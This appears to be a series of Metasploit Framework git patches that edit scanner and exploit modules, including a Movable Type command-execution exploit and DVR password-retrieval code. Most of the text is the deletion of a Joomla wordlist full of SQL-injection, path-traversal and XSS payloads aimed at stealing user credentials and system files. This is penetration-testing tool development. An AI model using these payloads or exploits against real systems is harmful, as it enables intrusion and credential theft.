@@ -253,21 +271,27 @@ def plugin_search (tpath, papp, ip, bres) :ntype => 'Plugin Found', :data => papp ) - elsif(res.code.to_i == 403 and datastore['VERBOSE']) + elsif(res.code == 403) if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) - print_status("#{ip} denied access to #{url} (SSL Required)") + vprint_status("#{ip} ip access to #{ip} (SSL Required)") elsif(res.body =~ /has a list of IP addresses that are not allowed/) - print_status("#{ip} restricted access by IP") + vprint_status("#{ip} restricted access by IP") elsif(res.body =~ /SSL client certificate is required/) - print_status("#{ip} requires a SSL client certificate") + vprint_status("#{ip} requires a SSL client certificate") else - print_status("#{ip} denied access to #{url} #{res.code} #{res.message}") + vprint_status("#{ip} denied access to #{ip}#{tpath}#{papp} - #{res.code} #{res.message}") end end rescue OpenSSL::SSL::SSLError + vprint_error("#{peer} - SSL error") + return :abort rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + vprint_error("#{peer} - Unable to Connect") + return :abort rescue ::Timeout::Error, ::Errno::EPIPE + vprint_error("#{peer} - Timeout error") + return :abort end From 2c12666f4e3359802cbf9593d7ad9e7b128c5e40 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Wed, 23 Jan 2013 21:10:05 -0600 Subject: [PATCH 140/421] Update the vendor to match the OEM source --- modules/auxiliary/scanner/misc/swann_dvr_passwords.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/scanner/misc/swann_dvr_passwords.rb b/modules/auxiliary/scanner/misc/swann_dvr_passwords.rb index 559e439b6a4f..af08f4d8c0c0 100644 --- a/modules/auxiliary/scanner/misc/swann_dvr_passwords.rb +++ b/modules/auxiliary/scanner/misc/swann_dvr_passwords.rb 
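Review bot: The `return :abort` added to the three rescue clauses here is never acted on by the caller. run_host (earlier hunk) calls `plugin_search(tpath,papp,ip,bres)` inside the `each_line` loop and `scan_pages(tpath,iapp,ip)` inside `iapps.each` and discards both results; only check_app's `:abort` is checked. A host that stops answering therefore still receives one request per wordlist line, each waiting out the 5 second timeout. In run_host I would use `break if plugin_search(tpath, papp, ip, bres) == :abort` and `return if scan_pages(tpath, iapp, ip) == :abort`. plugin_search begins in the previous hunk.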
@@ -16,13 +16,13 @@ class Metasploit3 < Msf::Auxiliary def initialize super( - 'Name' => 'Swann DVR Password Retriever', + 'Name' => 'Ray Sharp DVR Password Retriever', 'Description' => %q{ This module takes advantage of a protocol design issue with the - Swann DVR systems. It is possible to retrieve the username and - password through the TCP service running on port 9000. Other - brand DVRs with the same issue may include Lorex, Night Owl, Zmodo - URMET, and KGuard Security. + Ray Sharp based DVR systems. It is possible to retrieve the username and + password through the TCP service running on port 9000. Other brands using + this platform and exposing the same issue may include Swann, Lorex, + Night Owl, Zmodo, URMET, and KGuard Security. }, 'Author' => [ From 8e0924770303da7c738e7ef82613db8289ac9ae0 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Wed, 23 Jan 2013 21:10:25 -0600 Subject: [PATCH 141/421] Rename to match the OEM vendor --- .../misc/{swann_dvr_passwords.rb => raysharp_dvr_passwords.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/scanner/misc/{swann_dvr_passwords.rb => raysharp_dvr_passwords.rb} (100%) diff --git a/modules/auxiliary/scanner/misc/swann_dvr_passwords.rb b/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb similarity index 100% rename from modules/auxiliary/scanner/misc/swann_dvr_passwords.rb rename to modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb From 0c0f4a3e66455b38c371958b446852ee7778139e Mon Sep 17 00:00:00 2001 
From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 23 Jan 2013 23:35:31 -0600 Subject: [PATCH 142/421] Lower ranking because they cannot auto-target In order to be qualified as ExcellentRanking, auto-target is a must, or the module has to default to a payload that's universal for multiple platforms. Otherwise you're wasting time in Pro. --- modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb | 2 +- modules/exploits/multi/http/jenkins_script_console.rb | 2 +- modules/exploits/multi/http/splunk_upload_app_exec.rb | 2 +- modules/exploits/multi/http/struts_code_exec.rb | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb index 107cb3dd29b5..f196e486192f 100644 --- a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb +++ b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb @@ -8,7 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = GoodRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/multi/http/jenkins_script_console.rb b/modules/exploits/multi/http/jenkins_script_console.rb index 7d94d5640b87..bc195f03a921 100644 --- a/modules/exploits/multi/http/jenkins_script_console.rb +++ b/modules/exploits/multi/http/jenkins_script_console.rb @@ -8,7 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = GoodRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStagerVBS diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index f53da514dda0..4bf8cc5abdef 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb 
@@ -8,7 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/struts_code_exec.rb b/modules/exploits/multi/http/struts_code_exec.rb index 1c4bfc9e070f..1ff03167083a 100644 --- a/modules/exploits/multi/http/struts_code_exec.rb +++ b/modules/exploits/multi/http/struts_code_exec.rb @@ -8,7 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = GoodRanking include Msf::Exploit::CmdStagerTFTP include Msf::Exploit::Remote::HttpClient From 3146b7ce77ceb294da9cc26958bb58221e237c03 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 23 Jan 2013 23:40:47 -0600 Subject: [PATCH 143/421] Change default target ExcellentRanking requires the module to auto-target. If the payload is universal, that works too. --- .../exploits/multi/http/struts_code_exec_exception_delegator.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb index caa7d8b2da98..f33f57bfb14a 100644 --- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb +++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb @@ -64,7 +64,7 @@ def initialize(info = {}) ] ], 'DisclosureDate' => 'Jan 06 2012', - 'DefaultTarget' => 0)) + 'DefaultTarget' => 2)) register_options( [ From ba41ee9c83e993c5a6417e073eea2e7373b5dc16 Mon Sep 17 00:00:00 2001 From: Kacper Nowak <kacper.p.nowak@gmail.com> Date: Thu, 24 Jan 2013 13:15:42 +0000 Subject: [PATCH 144/421] - applied all the changes from #1363 - some extra escaping for the sake of it - removed the timeout in http_send_raw --- .../multi/http/movabletype_upgrade_exec.rb | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) 
diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb index 43224ee2d784..96c4a846cb19 100644 --- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb @@ -33,7 +33,7 @@ def initialize(info = {}) [ 'Kacper Nowak', 'Nick Blundell', - "Gary O'Leary-Steele" + 'Gary O\'Leary-Steele' ], 'References' => [ @@ -76,7 +76,7 @@ def check begin res = http_send_raw(fingerprint) rescue Rex::ConnectionError - return + return Exploit::CheckCode::Unknown end if (res) if (res.code == 200 and res.body =~ /Can't locate object method \\"dbi_driver\\" via package \\"#{fingerprint}\\" at/) @@ -86,6 +86,8 @@ def check else return Exploit::CheckCode::Safe end + else + return Exploit::CheckCode::Unknown end end @@ -95,8 +97,9 @@ def exploit http_send_cmd(payload.encoded) end - def http_send_raw(cmd, timeout=20) + def http_send_raw(cmd) path = normalize_uri(target_uri.path) + '/mt-upgrade.cgi' + pay = cmd.gsub('\\', '\\\\').gsub('"', '\"') send_request_cgi( { 'uri' => path, @@ -105,15 +108,15 @@ def http_send_raw(cmd, timeout=20) { '__mode' => 'run_actions', 'installing' => '1', - 'steps' => %{[["core_drop_meta_for_table","class","#{cmd.gsub('"', '\"')}"]]} + 'steps' => %{[["core_drop_meta_for_table","class","#{pay}"]]} } - }, timeout) + }) end def http_send_cmd(cmd) pay = 'v0;use MIME::Base64;system(decode_base64(q(' pay << Rex::Text.encode_base64(cmd) pay << ')));return 0' - http_send_raw(pay, 0.5) + http_send_raw(pay) end end From bf2b01f8ef53c6d185b91b071a351943e4171e92 Mon Sep 17 00:00:00 2001 From: f8lerror <f8lerror+git@gmail.com> Date: Thu, 24 Jan 2013 09:30:04 -0500 Subject: [PATCH 145/421] Delete a file and strip space --- data/wordlists/pcheck.txt | 627 ------------------ .../auxiliary/scanner/http/joomla_vulnscan.rb | 2 +- 2 files changed, 1 insertion(+), 628 deletions(-) delete mode 100755 data/wordlists/pcheck.txt 
diff --git a/data/wordlists/pcheck.txt b/data/wordlists/pcheck.txt deleted file mode 100755 index b65dd2a422e2..000000000000 --- a/data/wordlists/pcheck.txt +++ /dev/null 
@@ -1,627 +0,0 @@ -&controller=../../../../../../../../../../../../[LFI]%00 -?1.5.10-x -?1.5.11-x-http_ref -?1.5.11-x-php-s3lf -?1.5.3-path-disclose -?1.5.3-spam -?1.5.8-x -?1.5.9-x -?j1012-fixate-session -?option=com_mysms&Itemid=0&task=phonebook -Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png -admin/ -administrator/ -administrator/components/ -administrator/components/com_a6mambocredits/ -administrator/components/com_a6mambohelpdesk/ -administrator/components/com_admin/admin.admin.html.php -administrator/components/com_astatspro/refer.php -administrator/components/com_bayesiannaivefilter/ -administrator/components/com_chronocontact/excelwriter/PPS/File.php -administrator/components/com_colophon/ -administrator/components/com_colorlab/ -administrator/components/com_comprofiler/ -administrator/components/com_comprofiler/plugin.class.php -administrator/components/com_cropimage/admin.cropcanvas.php -administrator/components/com_extplorer/ -administrator/components/com_feederator/includes/tmsp/add_tmsp.php -administrator/components/com_googlebase/ -administrator/components/com_installer -administrator/components/com_jcs/ -administrator/components/com_jim/ -administrator/components/com_jjgallery/ -administrator/components/com_joom12pic/ -administrator/components/com_joomla-visites/ -administrator/components/com_joomla_flash_uploader/ -administrator/components/com_joomlaflashfun/ -administrator/components/com_joomlaradiov5/ -administrator/components/com_jpack/ -administrator/components/com_jreactions/ -administrator/components/com_juser/ -administrator/components/com_admin/ -administrator/components/com_kochsuite / -administrator/components/com_linkdirectory/ -administrator/components/com_livechat/getSavedChatRooms.php -administrator/components/com_livechat/xmlhttp.php -administrator/components/com_lurm_constructor/admin.lurm_constructor.php 
-administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php"); -administrator/components/com_mambelfish/ -administrator/components/com_mgm/ -administrator/components/com_mmp/help.mmp.php -administrator/components/com_mosmedia/ -administrator/components/com_multibanners/extadminmenus.class.php -administrator/components/com_panoramic/ -administrator/components/com_peoplebook/param.peoplebook.php -administrator/components/com_phpshop/toolbar.phpshop.html.php -administrator/components/com_remository/admin.remository.php -administrator/components/com_serverstat/install.serverstat.php -administrator/components/com_simpleswfupload/uploadhandler.php"); -administrator/components/com_swmenupro/ -administrator/components/com_treeg/ -administrator/components/com_uhp/ -administrator/components/com_uhp2/ -administrator/components/com_webring/ -administrator/components/com_wmtgallery/ -administrator/components/com_wmtportfolio/ -administrator/components/com_x-shop/ -administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+ -administrator/index.php?option=com_searchlog&act=log -ajaxim/ -akocomments.php -cart?Itemid=[SQLi] -component/com__brightweblinks/ -component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0 -component/osproperty/?task=agent_register -component/quran/index.php?option=com_quran&action=viewayat&surano= -components/com_ clickheat/ -components/com_5starhotels/ -components/com_Jambook/jambook.php -components/com_a6mambocredits/ -components/com_a6mambohelpdesk/ -components/com_ab_gallery/ -components/com_acajoom/ -components/com_acctexp/ -components/com_aclassf/ -components/com_activities/ -components/com_actualite/ -components/com_admin/admin.admin.html.php -components/com_advancedpoll/ -components/com_agora/ -components/com_agoragroup/ -components/com_ajaxchat/ -components/com_akobook/ -components/com_akocomment/ -components/com_akogallery 
-components/com_alberghi/ -components/com_allhotels/ -components/com_alphacontent/ -components/com_altas/ -components/com_amocourse/ -components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php -components/com_articles/ -components/com_artist/ -components/com_artlinks/ -components/com_asortyment/ -components/com_astatspro/ -components/com_awesom/ -components/com_babackup/ -components/com_banners/ -components/com_bayesiannaivefilter/ -components/com_be_it_easypartner/ -components/com_beamospetition/ -components/com_biblestudy/ -components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 -components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 -components/com_blog/ -components/com_bookflip/ -components/com_bookjoomlas/ -components/com_booklibrary/ -components/com_books/ -components/com_bsadv/ -components/com_bsq_sitestats/ -components/com_bsq_sitestats/external/rssfeed.php -components/com_bsqsitestats/ -components/com_calendar/ -components/com_camelcitydb2/ -components/com_candle/ -components/com_casino_blackjack/ -components/com_casino_videopoker/ -components/com_casinobase/ -components/com_catalogproduction/ -components/com_catalogshop/ -components/com_category/ -components/com_cgtestimonial/video.php?url="><script>alert('xss');</script> -components/com_chronocontact/excelwriter/PPS/File.php -components/com_cinema/ -components/com_clasifier/ -components/com_classifieds/ -components/com_clickheat/ -components/com_cloner/ -components/com_cmimarketplace/ -components/com_cms/ -components/com_colophon/ -components/com_colorlab/ -components/com_competitions/ -components/com_comprofiler/ -components/com_comprofiler/plugin.class.php -components/com_contactinfo/ -components/com_content/ -components/com_cpg/cpg.php -components/com_cropimage/admin.cropcanvas.php -components/com_custompages/ 
-components/com_cx/ -components/com_d3000/ -components/com_dadamail/ -components/com_dailymessage/ -components/com_datsogallery/ -components/com_dbquery/ -components/com_detail/ -components/com_digistore/ -components/com_directory/ -components/com_djiceshoutbox/ -components/com_doc/ -components/com_downloads/ -components/com_ds-syndicate/ -components/com_dtregister/ -components/com_dv/externals/phpupload/upload.php"); -components/com_easybook/ -components/com_emcomposer/ -components/com_equotes/ -components/com_estateagent/ -components/com_eventing/ -components/com_eventlist/ -components/com_events/ -components/com_ewriting/ -components/com_expose/uploadimg.php -components/com_expshop/ -components/com_extcalendar/ -components/com_extcalendar/cal_popup.php?extmode=view&extid= -components/com_extcalendar/extcalendar.php -components/com_extended_registration/registration_detailed.inc.php -components/com_extplorer/ -components/com_ezine/ -components/com_ezstore/ -components/com_facileforms/ -components/com_fantasytournament/ -components/com_faq/ -components/com_feederator/includes/tmsp/add_tmsp.php -components/com_filebase/ -components/com_filiale/ -components/com_flashfun/ -components/com_flashmagazinedeluxe/ -components/com_flippingbook/ -components/com_flyspray/startdown.php -components/com_fm/fm.install.php -components/com_foevpartners/ -components/com_football/ -components/com_formtool/ -components/com_forum/ -components/com_fq/ -components/com_fundraiser/ -components/com_galeria/ -components/com_galleria/galleria.html.php -components/com_gallery/ -components/com_game/ -components/com_gameq/ -components/com_garyscookbook/ -components/com_genealogy/ -components/com_geoboerse/ -components/com_gigcal/ -components/com_gmaps/ -components/com_googlebase/ -components/com_gsticketsystem/ -components/com_guide/ -components/com_hashcash/server.php -components/com_hbssearch/ -components/com_hello_world/ -components/com_hotproperties/ -components/com_hotproperty/ 
-components/com_hotspots/ -components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php -components/com_hwdvideoshare/ -components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1"); -components/com_ice/ -components/com_idoblog/ -components/com_idvnews/ -components/com_ignitegallery/ -components/com_ijoomla_archive/ -components/com_ijoomla_rss/ -components/com_inter/ -components/com_ionfiles/ -components/com_is/ -components/com_ixxocart/ -components/com_jabode/ -components/com_jashowcase/ -components/com_jb2/ -components/com_jce/ -components/com_jcs/ -components/com_jd-wiki/ -components/com_jd-wp/ -components/com_jim/ -components/com_jjgallery/ -components/com_jmovies/ -components/com_jobline/ -components/com_jombib/ -components/com_joobb/ -components/com_jooget/ -components/com_joom12pic/ -components/com_joomla-visites/ -components/com_joomla_flash_uploader/ -components/com_joomlaboard/ -components/com_joomladate/ -components/com_joomlaflashfun/ -components/com_joomlalib/ -components/com_joomlaradiov5/ -components/com_joomlavvz/ -components/com_joomlaxplorer/ -components/com_joomloads/ -components/com_joomradio/ -components/com_joomtracker/ -components/com_joovideo/ -components/com_jotloader/ -components/com_journal/ -components/com_jpack/ -components/com_jpad/ -components/com_jreactions/ -components/com_jreviews/scripts/xajax.inc.php -components/com_jumi/ -components/com_juser/ -components/com_jvideo/ -components/com_k2/ -components/com_kbase/ -components/com_knowledgebase/fckeditor/fckeditor.js -components/com_kochsuite / -components/com_kunena/ -components/com_letterman/ -components/com_lexikon/ -components/com_linkdirectory/ -components/com_listoffreeads/ -components/com_livechat/getSavedChatRooms.php -components/com_livechat/xmlhttp.php -components/com_liveticker/ -components/com_lm/ -components/com_lmo/ -components/com_loudmounth/includes/abbc/abbc.class.php -components/com_loudmouth/ -components/com_lowcosthotels/ 
-components/com_lurm_constructor/admin.lurm_constructor.php -components/com_mad4joomla/ -components/com_madeira/img.php -components/com_maianmusic/ -components/com_mailarchive/ -components/com_mailto/ -components/com_mambatstaff/mambatstaff.php -components/com_mambelfish/ -components/com_mambospgm/ -components/com_mambowiki/MamboLogin.php -components/com_marketplace/ -components/com_mcquiz/ -components/com_mdigg/ -components/com_media_library/ -components/com_mediaslide/ -components/com_mezun/ -components/com_mgm/ -components/com_minibb/ -components/com_misterestate/ -components/com_mmp/help.mmp.php -components/com_model/ -components/com_moodle/moodle.php -components/com_moofaq/ -components/com_mosmedia/ -components/com_mospray/scripts/admin.php -components/com_mosres/ -components/com_most/ -components/com_mp3_allopass/ -components/com_mtree/ -components/com_mtree/img/listings/o/{id}.php -components/com_multibanners/extadminmenus.class.php -components/com_myalbum/ -components/com_mycontent/ -components/com_mydyngallery/ -components/com_mygallery/ -components/com_n-forms/ -components/com_na_content/ -components/com_na_mydocs/ -components/com_na_newsdescription/ -components/com_na_qforms/ -components/com_neogallery/ -components/com_neorecruit/ -components/com_neoreferences/ -components/com_netinvoice/ -components/com_news/ -components/com_news_portal/ -components/com_newsflash/ -components/com_nfn_addressbook/ -components/com_nicetalk/ -components/com_noticias/ -components/com_omnirealestate/ -components/com_omphotogallery/ -components/com_ongumatimesheet20/ -components/com_onlineflashquiz/ -components/com_ownbiblio/ -components/com_panoramic/ -components/com_paxgallery/ -components/com_paxxgallery/ -components/com_pcchess/ -components/com_pcchess/include.pcchess.php -components/com_pccookbook/ -components/com_pccookbook/pccookbook.php -components/com_peoplebook/param.peoplebook.php -components/com_performs/ -components/com_philaform/ 
-components/com_phocadocumentation/ -components/com_php/ -components/com_phpshop/toolbar.phpshop.html.php -components/com_pinboard/ -components/com_pms/ -components/com_poll/ -components/com_pollxt/ -components/com_ponygallery/ -components/com_portafolio/ -components/com_portfol/ -components/com_prayercenter/ -components/com_pro_desk/ -components/com_prod/ -components/com_productshowcase/ -components/com_profiler/ -components/com_projectfork/ -components/com_propertylab/ -components/com_puarcade/ -components/com_publication/ -components/com_quiz/ -components/com_rapidrecipe/ -components/com_rdautos/ -components/com_realestatemanager/ -components/com_recly/ -components/com_referenzen/ -components/com_rekry/ -components/com_remository/admin.remository.php -components/com_remository_files/file_image_14/1276100016shell.php -components/com_reporter/processor/reporter.sql.php -components/com_resman/ -components/com_restaurante/ -components/com_ricette/ -components/com_rsfiles/ -components/com_rsgallery/ -components/com_rsgallery2/ -components/com_rss/ -components/com_rssreader/ -components/com_rssxt/ -components/com_rwcards/ -components/com_school/ -components/com_search/ -components/com_sebercart/getPic.php?p=[LFD]%00 -components/com_securityimages/ -components/com_sef/ -components/com_seminar/ -components/com_serverstat/install.serverstat.php -components/com_sg/ -components/com_simple_review/ -components/com_simpleboard/ -components/com_simplefaq/ -components/com_simpleshop/ -components/com_sitemap/sitemap.xml.php -components/com_slideshow/ -components/com_smf/ -components/com_smf/smf.php -components/com_swmenupro/ -components/com_team/ -components/com_tech_article/ -components/com_thopper/ -components/com_thyme/ -components/com_tickets/ -components/com_tophotelmodule/ -components/com_tour_toto/ -components/com_trade/ -components/com_uhp/ -components/com_uhp2/ -components/com_user/controller.php -components/com_users/ 
-components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php -components/com_vehiclemanager/ -components/com_versioning / -components/com_videodb/core/videodb.class.xml.php -components/com_virtuemart/ -components/com_volunteer/ -components/com_vr/ -components/com_waticketsystem/ -components/com_webhosting/ -components/com_weblinks/ -components/com_webring/ -components/com_wmtgallery/ -components/com_wmtportfolio/ -components/com_x-shop/ -components/com_xevidmegahd/ -components/com_xewebtv/ -components/com_xfaq/ -components/com_xgallery/helpers/img.php?file= -components/com_xsstream-dm/ -components/com_ynews/ -components/com_yvcomment/ -components/com_zoom/classes/ -components/mod_letterman/ -components/remository/ -eXtplorer/ -easyblog/entry/uncategorized -extplorer/ -http://{target}/components/com_mtree/img/listings/o/{id}.php where {id} -includes/joomla.php -index.php/404' -index.php/?option=com_question&catID=21' and+1=0 union all -index.php/image-gallery/"><script>alert('xss')</script>/25-koala -index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1 -index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view -index.php?option=com_aardvertiser&cat_name=conf&task=<= -index.php?option=com_aardvertiser&task= -index.php?option=com_abc&view=abc&letter=AS§ionid=' -index.php?option=com_advert&id=36' -index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users-- -index.php?option=com_alfurqan15x&action=viewayat&surano= -index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version -index.php?option=com_annonces&view=edit&Itemid=1 -index.php?option=com_articleman&task=new -index.php?option=com_bbs&bid=-1 -index.php?option=com_beamospetition&startpage=3&pet=- -index.php?option=com_beamospetition&startpage=3&pet=-1+Union+select+user()+from+jos_users- -index.php?option=com_bearleague&task=team&tid=8&sid=1&Itemid=%27 
-index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00 -index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 -index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00 -index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=-1 -index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users-- -index.php?option=com_chronoconnectivity&itemid=1 -index.php?option=com_chronocontact&itemid=1 -index.php?option=com_cinema&Itemid=S@BUN&func=detail&id= -index.php?option=com_clantools&squad=1+ -index.php?option=com_clantools&task=clanwar&showgame=1+ -index.php?option=com_commedia&format=raw&task=image&pid=4&id=964' -index.php?option=com_commedia&task=page&commpid=21 -index.php?option=com_connect&view=connect&controller= -index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../ -index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00 -index.php?option=com_dioneformwizard&controller=[LFI]%00 -index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=-1 -index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12 -index.php?option=com_easyfaq&Itemid=1&task=view&gid= -index.php?option=com_easyfaq&catid=1&task=view&id=-2527+ -index.php?option=com_easyfaq&task=view&contact_id= -index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id= -index.php?option=com_equipment&task=components&id=45&sec_men_id= -index.php?option=com_equipment&view=details&id= -index.php?option=com_estateagent&Itemid=47&act=object&task=showEO&id=[sqli] -index.php?option=com_etree&view=displays&layout=category&id=[SQL] -index.php?option=com_etree&view=displays&layout=user&user_id=[SQL] 
-index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1 -index.php?option=com_fabrik&view=table&tableid=13+union+select+1---- -index.php?option=com_filecabinet&task=download&cid[]=7 -index.php?option=com_firmy&task=section_show_set&Id=-1 -index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R -index.php?option=com_golfcourseguide&view=golfcourses&cid=1&id= -index.php?option=com_graphics&controller= -index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0&data_search= -index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp= -index.php?option=com_huruhelpdesk&view=detail -index.php?option=com_huruhelpdesk&view=detail&cid[0]= -index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1 -index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 -index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 -index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1 -index.php?option=com_iproperty&view=agentproperties&id= -index.php?option=com_jacomment&view= -index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00 -index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00 -index.php?option=com_jcommunity&controller=members&task=1' -index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13 -index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2 -index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2 -index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00 -index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL))) -index.php?option=com_jfuploader&Itemid= -index.php?option=com_jgen&task=view&id= 
-index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00 -index.php?option=com_jimtawl&Itemid=12&task= -index.php?option=com_jmarket&controller=product&task=1' -index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1' -index.php?option=com_jomdirectory&task=search&type=111+ -index.php?option=com_joomdle&view=detail&cat_id=1&course_id= -index.php?option=com_joomla_flash_uploader&Itemid=1 -index.php?option=com_joomleague&func=showNextMatch&p=[sqli] -index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid=[sqli] -index.php?option=com_joomtouch&controller= -index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00 -index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00 -index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users -index.php?option=com_jstore&controller=product-display&task=1' -index.php?option=com_jsubscription&controller=subscription&task=1' -index.php?option=com_jtickets&controller=ticket&task=1' -index.php?option=com_konsultasi&act=detail&sid= -index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en -index.php?option=com_kunena&func=userlist&search= -index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1' -index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00 -index.php?option=com_markt&page=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_users-- -index.php?option=com_matamko&controller= -index.php?option=com_myhome&task=4&nidimmindex.php?option=com_myhome&task=4&nidimm -index.php?option=com_neorecruit&task=offer_view&id= -index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users-- -index.php?option=com_noticeboard&controller= 
